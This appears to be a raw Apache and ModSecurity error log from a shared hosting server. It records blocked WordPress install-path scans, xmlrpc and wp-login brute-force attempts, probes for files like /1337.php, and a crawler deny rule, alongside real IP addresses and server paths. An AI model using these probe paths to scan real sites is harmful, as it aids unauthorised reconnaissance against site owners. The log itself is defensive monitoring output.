[Tue May 26 15:45:16.919781 2026] [security2:error] [pid 733610:tid 733754] [client 54.205.63.235:63139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVytMLL_4PasUNKBsfv7wAAAA4"]
[Tue May 26 15:45:16.919860 2026] [security2:error] [pid 733610:tid 733803] [client 54.205.63.235:63136] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVytMLL_4PasUNKBsfv7QAAAD8"]
[Tue May 26 15:45:16.919966 2026] [security2:error] [pid 745492:tid 745742] [client 54.205.63.235:63141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr1AAAAPo"]
[Tue May 26 15:45:16.920136 2026] [security2:error] [pid 745492:tid 745685] [client 54.205.63.235:63143] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr1gAAAME"]
[Tue May 26 15:45:16.920138 2026] [security2:error] [pid 745492:tid 745660] [client 54.205.63.235:63142] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/old/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr1QAAAKg"]
[Tue May 26 15:45:16.920469 2026] [security2:error] [pid 745492:tid 745671] [client 54.205.63.235:63144] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr1wAAALM"]
[Tue May 26 15:45:16.920592 2026] [security2:error] [pid 745492:tid 745693] [client 54.205.63.235:63145] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr2AAAAMk"]
[Tue May 26 15:45:16.920608 2026] [security2:error] [pid 745492:tid 745742] [client 54.205.63.235:63147] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr2gAAAPo"]
[Tue May 26 15:45:16.920738 2026] [security2:error] [pid 745492:tid 745732] [client 54.205.63.235:63146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr2QAAAPA"]
[Tue May 26 15:45:16.920981 2026] [security2:error] [pid 733610:tid 733782] [client 54.205.63.235:63140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/wp-admin/install.php"] [unique_id "ahVytMLL_4PasUNKBsfv8AAAACo"]
[Tue May 26 15:45:16.984594 2026] [security2:error] [pid 745492:tid 745665] [client 54.205.63.235:63225] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "acdealernoida.in"] [uri "/test/wp-admin/install.php"] [unique_id "ahVytImEQglTmoWcfxJr2wAAAK0"]
[Tue May 26 15:45:17.260475 2026] [security2:error] [pid 745492:tid 745674] [client 143.110.243.118:51690] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/1337.php"] [unique_id "ahVytYmEQglTmoWcfxJr5QAAALY"]
[Tue May 26 15:45:18.253108 2026] [security2:error] [pid 745492:tid 745717] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVytYmEQglTmoWcfxJr8wAAAOE"]
[Tue May 26 15:45:18.722475 2026] [security2:error] [pid 733610:tid 733849] [client 88.151.32.54:56688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVytcLL_4PasUNKBsfv9gAAAG0"]
[Tue May 26 15:45:18.938131 2026] [security2:error] [pid 745492:tid 745641] [client 223.123.35.44:35771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVytomEQglTmoWcfxJr_wAAAJU"]
[Tue May 26 15:45:18.938275 2026] [security2:error] [pid 745492:tid 745641] [client 223.123.35.44:35771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVytomEQglTmoWcfxJr_wAAAJU"]
[Tue May 26 15:45:20.060692 2026] [security2:error] [pid 745492:tid 745685] [client 49.13.130.29:52352] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVyt4mEQglTmoWcfxJsDgAAAME"], referer: https://thegoodsporting.com
[Tue May 26 15:45:20.498456 2026] [security2:error] [pid 745492:tid 745674] [client 113.168.168.119:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyuImEQglTmoWcfxJsGgAAALY"]
[Tue May 26 15:45:20.962640 2026] [security2:error] [pid 733610:tid 733847] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyuMLL_4PasUNKBsfwJAAAAGs"]
[Tue May 26 15:45:20.972428 2026] [security2:error] [pid 733610:tid 733735] [remote 74.7.241.58:58976] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVyuMLL_4PasUNKBsfwMwAATHw"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/src/Frontend
[Tue May 26 15:45:21.564613 2026] [security2:error] [pid 733610:tid 733763] [client 103.153.130.62:64402] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyucLL_4PasUNKBsfwNwAAABc"]
[Tue May 26 15:45:21.564742 2026] [security2:error] [pid 733610:tid 733763] [client 103.153.130.62:64402] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyucLL_4PasUNKBsfwNwAAABc"]
[Tue May 26 15:45:21.958781 2026] [autoindex:error] [pid 733610:tid 733756] [client 40.160.16.154:0] AH01276: Cannot serve directory /home2/glorolle/public_html/juniorwoodies.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:45:22.398055 2026] [security2:error] [pid 733610:tid 733810] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyucLL_4PasUNKBsfwQAAAAEY"]
[Tue May 26 15:45:23.502631 2026] [security2:error] [pid 745492:tid 745666] [client 31.57.184.107:56811] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "sharejoy.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyu4mEQglTmoWcfxJsSgAAAK4"]
[Tue May 26 15:45:23.738795 2026] [security2:error] [pid 733610:tid 733795] [client 114.119.128.127:57149] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/beta/index.php"] [unique_id "ahVyu8LL_4PasUNKBsfwaQAAADc"], referer: http://glorodavionics.com/beta/index.php?route=product%2Fcategory&path=72_79_124
[Tue May 26 15:45:24.284521 2026] [security2:error] [pid 733610:tid 733838] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyu8LL_4PasUNKBsfwbAAAAGI"]
[Tue May 26 15:45:26.457792 2026] [security2:error] [pid 745492:tid 745691] [client 83.217.213.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bloggertarget.com"] [uri "/index.php"] [unique_id "ahVyvomEQglTmoWcfxJsdgAAAMc"], referer: https://bloggertarget.com/100-best-free-latest-directory-submission-list/
[Tue May 26 15:45:27.148006 2026] [security2:error] [pid 733610:tid 733823] [client 223.123.35.44:35772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyv8LL_4PasUNKBsfwmgAAAFM"]
[Tue May 26 15:45:27.148117 2026] [security2:error] [pid 733610:tid 733823] [client 223.123.35.44:35772] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyv8LL_4PasUNKBsfwmgAAAFM"]
[Tue May 26 15:45:27.210821 2026] [security2:error] [pid 745492:tid 745723] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyvomEQglTmoWcfxJsfwAAAOc"]
[Tue May 26 15:45:28.310636 2026] [security2:error] [pid 745492:tid 745639] [client 83.217.213.120:52294] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "83.217.213.120" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVywImEQglTmoWcfxJskwAAAJM"], referer: http://www.bloggertarget.com/top-50-free-instant-approval-blog-commenting-site-list/
[Tue May 26 15:45:28.310777 2026] [security2:error] [pid 745492:tid 745639] [client 83.217.213.120:52294] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVywImEQglTmoWcfxJskwAAAJM"], referer: http://www.bloggertarget.com/top-50-free-instant-approval-blog-commenting-site-list/
[Tue May 26 15:45:28.669800 2026] [security2:error] [pid 745492:tid 745649] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVywImEQglTmoWcfxJskgAAAJ0"]
[Tue May 26 15:45:29.452264 2026] [security2:error] [pid 745492:tid 745705] [client 202.28.194.139:52685] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "202.28.194.139" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVywYmEQglTmoWcfxJslgAAANU"], referer: http://www.bloggertarget.com/top-50-free-instant-approval-blog-commenting-site-list/
[Tue May 26 15:45:29.452347 2026] [security2:error] [pid 745492:tid 745705] [client 202.28.194.139:52685] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVywYmEQglTmoWcfxJslgAAANU"], referer: http://www.bloggertarget.com/top-50-free-instant-approval-blog-commenting-site-list/
[Tue May 26 15:45:30.728381 2026] [security2:error] [pid 733610:tid 733849] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVywsLL_4PasUNKBsfwzgAAAG0"]
[Tue May 26 15:45:30.911401 2026] [security2:error] [pid 745492:tid 745644] [client 143.110.243.118:60380] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/user.php"] [unique_id "ahVywomEQglTmoWcfxJspwAAAJg"]
[Tue May 26 15:45:32.005686 2026] [security2:error] [pid 733610:tid 733804] [client 31.57.184.107:64795] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "clubcaterpillarmotor.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVyxMLL_4PasUNKBsfw_AAAAEA"], referer: https://www.google.com/
[Tue May 26 15:45:32.305050 2026] [security2:error] [pid 733610:tid 733796] [client 103.153.130.62:64682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyxMLL_4PasUNKBsfxCgAAADg"]
[Tue May 26 15:45:32.305169 2026] [security2:error] [pid 733610:tid 733796] [client 103.153.130.62:64682] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyxMLL_4PasUNKBsfxCgAAADg"]
[Tue May 26 15:45:32.597538 2026] [security2:error] [pid 733610:tid 733803] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyxMLL_4PasUNKBsfxAQAAAD8"]
[Tue May 26 15:45:34.048670 2026] [security2:error] [pid 733610:tid 733757] [client 88.151.32.54:56694] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyxMLL_4PasUNKBsfxEwAAABE"]
[Tue May 26 15:45:35.502332 2026] [security2:error] [pid 733610:tid 733759] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyx8LL_4PasUNKBsfxKgAAABM"]
[Tue May 26 15:45:36.654175 2026] [security2:error] [pid 745492:tid 745576] [remote 173.249.15.100:32952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 100.15.249.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVyyImEQglTmoWcfxJs6AAAmFA"]
[Tue May 26 15:45:36.800961 2026] [security2:error] [pid 745492:tid 745683] [client 223.123.35.44:35773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyyImEQglTmoWcfxJs7AAAAL8"]
[Tue May 26 15:45:36.801113 2026] [security2:error] [pid 745492:tid 745683] [client 223.123.35.44:35773] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVyyImEQglTmoWcfxJs7AAAAL8"]
[Tue May 26 15:45:37.491168 2026] [security2:error] [pid 733610:tid 733818] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyycLL_4PasUNKBsfxTwAAAE4"]
[Tue May 26 15:45:38.707657 2026] [security2:error] [pid 733610:tid 733780] [client 143.110.243.118:60392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/wp-info.php"] [unique_id "ahVyysLL_4PasUNKBsfxZAAAACg"]
[Tue May 26 15:45:39.137664 2026] [security2:error] [pid 745492:tid 745661] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyyomEQglTmoWcfxJtBgAAAKk"]
[Tue May 26 15:45:40.730929 2026] [security2:error] [pid 733610:tid 733812] [client 88.151.32.54:56698] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyy8LL_4PasUNKBsfxawAAAEg"]
[Tue May 26 15:45:41.711347 2026] [security2:error] [pid 745492:tid 745735] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyzYmEQglTmoWcfxJtNgAAAPM"]
[Tue May 26 15:45:42.399272 2026] [autoindex:error] [pid 745492:tid 745750] [client 170.106.167.214:53922] AH01276: Cannot serve directory /home1/dprlky8f/dprassurance.lk/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:45:42.934852 2026] [security2:error] [pid 745492:tid 745690] [client 103.153.130.62:64960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyzomEQglTmoWcfxJtVwAAAMY"]
[Tue May 26 15:45:42.934977 2026] [security2:error] [pid 745492:tid 745690] [client 103.153.130.62:64960] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVyzomEQglTmoWcfxJtVwAAAMY"]
[Tue May 26 15:45:43.434238 2026] [security2:error] [pid 733610:tid 733843] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVyz8LL_4PasUNKBsfxnwAAAGc"]
[Tue May 26 15:45:44.232079 2026] [autoindex:error] [pid 733610:tid 733861] [client 35.227.91.180:54955] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:45:45.026713 2026] [security2:error] [pid 733610:tid 733751] [client 35.227.91.180:54955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 180.91.227.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "stvica.com"] [uri "/xmlrpc.php"] [unique_id "ahVy0MLL_4PasUNKBsfxxAAAAAs"]
[Tue May 26 15:45:45.069989 2026] [security2:error] [pid 733610:tid 733785] [client 88.151.32.54:56700] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.murugaa.in.freshmindsolutions.com"] [uri "/index.php"] [unique_id "ahVyz8LL_4PasUNKBsfxrQAAAC0"]
[Tue May 26 15:45:45.209744 2026] [security2:error] [pid 745492:tid 745699] [client 35.227.91.180:62443] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0YmEQglTmoWcfxJtZAAAAM8"]
[Tue May 26 15:45:45.413982 2026] [security2:error] [pid 733610:tid 733848] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVy0MLL_4PasUNKBsfx0AAAAGw"]
[Tue May 26 15:45:45.427020 2026] [security2:error] [pid 745492:tid 745734] [client 35.227.91.180:49963] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "stvica.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVy0YmEQglTmoWcfxJtZgAAAPI"]
